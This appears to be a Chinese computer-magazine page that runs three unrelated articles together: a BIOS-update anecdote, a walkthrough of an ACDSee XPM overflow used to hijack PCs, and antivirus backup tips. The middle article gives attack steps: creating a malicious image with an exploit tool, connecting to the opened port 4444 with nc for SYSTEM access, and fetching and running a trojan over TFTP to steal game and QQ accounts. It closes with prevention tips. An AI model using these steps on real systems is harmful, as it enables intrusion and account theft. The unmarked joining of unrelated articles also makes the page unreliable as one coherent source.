当我正打算换一个风扇的时候,偶然在网上看到微星更新了这款主板的BIOS(当时最新版本是1.8),我试着刷新后发现CPU的温度降到了33℃,而风扇也随着降到了3000rpm左右。我返回来看网站上的介绍,新的BIOS修正了主板测温的错误。
从那次开始,我非常留意网上主板BIOS更新的信息,并争取在第一时间更新,版本从1.8升级到1.9,没过几天又从1.9换为1.A。可是问题也随之出现了:机器总是无缘无故地自动重启,刚打开浏览器准备去社区逛逛,显示器屏幕一黑,重启了。
开始还以为是天气热,CPU温度过高引起的,便把BIOS中的CPU风扇的阈值提高到了50℃(原来一直是40℃),回到Windows XP后发现问题还是没有解决。Www.iTcOMpUter.Com.cN这是怎么回事啊?忽然我又想到了主板的BIOS,忙上网查看微星的官方主页,但那时上面并没有新的版本放出来(目前最新版本为1.B),无奈之下,我看了看网站上那些关于BIOS的英文说明,发现上面介绍1.8版以后的BIOS都更改了主板对新内核版本的CPU的支持,到了1.A后,主板就能更好地支持E6版本的Athlon 64 3000+了。这下我有点明白了,马上动手刷新主板BIOS(这次是刷回1.8版的文件),刷完后重启系统,聊天、BT、看DVD等,使用了2个多小时,系统没有发生异常的重启,再试试游戏也没问题,故障终于解决了。
经过这次磨难我终于明白了,最新的不一定是最好的,最适合的才是最好的。在这里我也提醒各位读者朋友,在更新BIOS或者是硬件驱动程序时,一定要看看它的说明,确定适合自己机器的才行。
利用最新ACDSee图片抓鸡法大曝光
如果给你一张图片,并告诉你它可以黑你,你首先想到的是不是这张图片捆绑了木马?你会这么想不无道理,因为这种古老的图片抓鸡法大多的变化都是在捆绑木马上,几乎没有打过图片的主意。但是这种全新超隐蔽的图片抓鸡法,在今年9月诞生了,在黑客圈中广为流传。它利用的就是ACDSee软件(8.1和9.0)。在装机时一般都会预装一些常用软件,不少朋友可能就装有ACDSee软件,这样就给了黑客可乘之机。你也许会有疑问,不捆绑木马,图片是怎么黑我的?看完本文,你就全明白了。
隐蔽在ACDSee图片中的黑手
普通的图片抓鸡法就是在图片上捆绑木马,然后再传播。这种方法虽然还有人用,但是成功率已经不高了,因为很容易第一时间就被发现。
现在,一种最新的图片抓鸡法正在黑客圈中流传,它的原理就是利用数字图像处理软件ACDSeeID_X.apl插件在处理内部结构错误的XPM文件时,如果部分字符串大于4096字节的话就会触发溢出。
黑客首先利用最近才在网络上流传的专用工具创建一张特殊图片,接着通过各种方法将该图片发送出去。用户受骗打开了该图片就会激活4444端口,黑客就可以通过溢出上传木马程序。一旦上传的木马程序成功运行后,用户的电脑就会变成“肉鸡”,游戏账号、QQ等就会被盗。
ACDSee是怎样被用来抓鸡的
1.创建特殊图片
点击开始菜单中的“运行”命令,输入“cmd”打开命令提示符窗口,然后跳转到ACDSee漏洞利用工具的所在目录。首先输入该工具名称查看其使用方法,从中看到该工具有两种使用方法。这里我们输入:xmp 1 test.xmp回车(图1),这样即可创建一张特殊图片。
2.盗取System权限
首先将图片文件发送出去,当用户双击打开该文件时,就会在远程系统打开4444的端口。现在打开另外一个命令提示符窗口,使用命令“nc -vv 远程IP地址 4444”来进行连接。这时用黑客工具NC就会得到溢出的结果并获得System的权限(图2)。
3.上传木马抓鸡
现在先准备一个木马程序mm.exe,接着运行Tftpd32来架设一个服务器。点击“设置”按钮设置木马的所在目录以及本机IP地址就可以了。
现在切换到System权限的命令提示符窗口,直接输入“tftp -i 本地IP get 远程IP mm.exe”即可。上传完成后运行“start mm.exe”命令执行木马程序,连接成功后肉鸡就到手了,以后就可以为所欲为了。
防范技巧
技巧1:不要随便接收陌生人的任何文件,也不要下载那些不知情的文件。很多人以为只有可疑的应用程序才有危险,实际上任何文件都可能成为黑客入侵的帮手。
技巧2:将系统中的ACDSee更新到9.1以上版本(8.1和9.0版本的有这个漏洞),或一些经典但较老的软件版本。因为最新的软件版本已经修复了该漏洞,而老的版本并不存在该漏洞。
技巧3:利用系统自带的网络防火墙或者第三方的网络防火墙,对溢出时利用的4444端口进行封堵。这样就算是漏洞被激活,也不可能被黑客所控制利用。
防抓鸡系列小结
通过这么多期抓鸡系列的介绍,我们可以看到黑客抓鸡的手法灵活多变,既有利用常用软件溢出抓鸡的,又有通过端口抓鸡的,还有巧用迅雷发布抓鸡的。不管抓鸡方式怎么变,防范的思路基本上变化不大。
首先要确保各种系统和常用软件漏洞的修补,这段时间很多黑客都在寻找常用软件的漏洞,大家一定要注意常用软件的更新。其次,要及时更新杀毒软件并使用一些查杀木马能力较强的安全工具,如EWIDO(下载地址:http://www.cpcw.com/bzsoft)。最后,一定要记住不放心的文件不打开,不正规的网站不去,提高安全意识。
系统重装后让杀毒软件保持最新状态 重装系统后,其他软件都好说,杀毒软件要重新安装一遍就有问题了。因为杀毒软件是升级次数最多的软件,而安装程序则是最初的版本,如果我们重新上网升级,就需要下载一个很大的升级包。那如何才能保留杀毒软件的最新版本呢?下面就向大家介绍几种方法。
拷贝法
将杀毒软件的安装目录的文件全部copy到另外一个分区中,当重新安装完系统后,再将该目录原样拷回即可。但应注意的是,很多杀毒软件安装时在注册表中写入相关信息,并在桌面和开始菜单中建立一些快捷方式,如果用户直接拷回来,有可能会造成某些功能不能正常使用。另外,这些快捷方式还需要用户自己亲手去建立。因此,笔者建议,用户在采用这种方式拷回最新版的杀毒软件目录之前,最好先安装一下原始的杀毒软件,然后再拷回。
制作硬盘安装备份包
笔者用的是瑞星杀毒软件,它的工具菜单中有个“制作硬盘安装备份”项。启动该功能项,只要按照系统的提示操作,最终会在C:\RAVBACK目录中生成一个完整的安装包,这时你只要将该目录保存到其他分区下,在系统重装后直接点击该备份目录中的setup程序,就可以安装最新版本的瑞星杀毒软件。
制作增量升级包
制作增量升级包的方法也可以恢复你的杀毒软件的最新版本,瑞星杀毒软件工具菜单中的“制作增量升级包”就可以实现这个功能。启用该功能,然后按照提示插入瑞星安装光盘和一张空白软盘,按照提示操作,最后会生成一个有增量升级包的软盘。当重装系统后,先安装杀毒软件的原始版本,然后再运行一下软盘上的安装程序,就可以将本机上的瑞星杀毒软件升级到最新版本了。当然,生成的这张升级软盘,你还可以送给不方便经常升级的朋友,让他们也能及时得到保护。
From:http://www.itcomputer.com.cn/Article/Hardware/201309/2611.html